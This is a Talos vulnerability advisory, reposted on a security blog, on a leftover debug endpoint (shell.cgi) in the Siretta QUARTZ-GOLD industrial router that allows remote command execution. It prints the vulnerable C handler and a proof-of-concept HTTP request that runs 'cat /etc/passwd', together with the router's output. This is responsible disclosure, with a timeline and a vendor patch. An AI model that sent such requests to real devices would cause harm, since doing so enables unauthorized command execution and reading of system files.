Site icon API Security Blog

Siretta QUARTZ-GOLD httpd shell.cgi leftover debug code vulnerability

# Talos Vulnerability Report

### TALOS-2022-1610

## Siretta QUARTZ-GOLD httpd shell.cgi leftover debug code vulnerability

##### January 26, 2023

##### CVE Number

CVE-2022-38715

##### SUMMARY

A leftover debug code vulnerability exists in the httpd shell.cgi functionality of Siretta QUARTZ-GOLD G5.0.1.5-210720-141020. A specially-crafted HTTP request can lead to remote code execution. An attacker can send an HTTP request to trigger this vulnerability.

##### CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Siretta QUARTZ-GOLD G5.0.1.5-210720-141020

##### PRODUCT URLS

QUARTZ-GOLD –

##### CVSSv3 SCORE

7.2 – CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

##### CWE

CWE-489 – Leftover Debug Code

##### DETAILS

The Siretta QUARTZ-GOLD is an industrial cellular router with several features and services, such as: SSH, UPNP, VPN, SNMP and many others.

Based on the web page shown, functionalities and the documentation publicly available, the QUARTZ-GOLD does not provide any way to directly access the linux system that runs on the router. The router’s web server is based on AdvancedTomato, which offers several debug APIs active by default. The developer, allegedly, forgot to disable those debug APIs. For instance, the AdvancedTomato’s `shell.cgi` API is still active, allowing arbitrary command execution:

static void wo_shell(char *url)
{
web_puts(“ncmdresult = ‘”);
_execute_command(NULL, webcgi_get(“command”), NULL, WOF_JAVASCRIPT);
web_puts(“‘;”);
}

`wo_shell` is the function that is called when the `shell.cgi` API is requested. This function will call the `_execute_command` with the request’s `command` parameter. This function will effectively execute the provided shell command. The leftover debug code allows arbitrary command execution.

### Exploit Proof of Concept

Sending a request like the following:

POST /shell.cgi HTTP/1.1
Authorization: Basic
Content-Length: 52

command=cat /etc/passwd&_http_id=

Will generate the following response:

HTTP/1.0 200 OK
Date: Sat, 01 Jan 2000 22:01:30 GMT
Content-Type: text/javascript
Cache-Control: no-cache, no-store, must-revalidate, private
Expires: Thu, 31 Dec 1970 00:00:00 GMT
Pragma: no-cache
Connection: close

cmdresult = ‘root:x:0:0:root:/root:/bin/shx0aadmin:x:0:0:admin:/root:/bin/shx0anobody:x:65534:65534:nobody:/dev/null:/dev/nullx0a’;

The request will make the router execute the command `cat /etc/passwd` and respond to the HTTP request with the output of the command back.

##### TIMELINE

2022-10-14 – Initial Vendor Contact

2022-10-20 – Vendor Disclosure

2022-11-24 – Vendor Patch Release

2023-01-26 – Public Release

##### Credit

Discovered by Francesco Benvenuto of Cisco Talos.

* * *

Vulnerability Reports Next Report

TALOS-2022-1615

Previous Report

TALOS-2022-1608Read More

Exit mobile version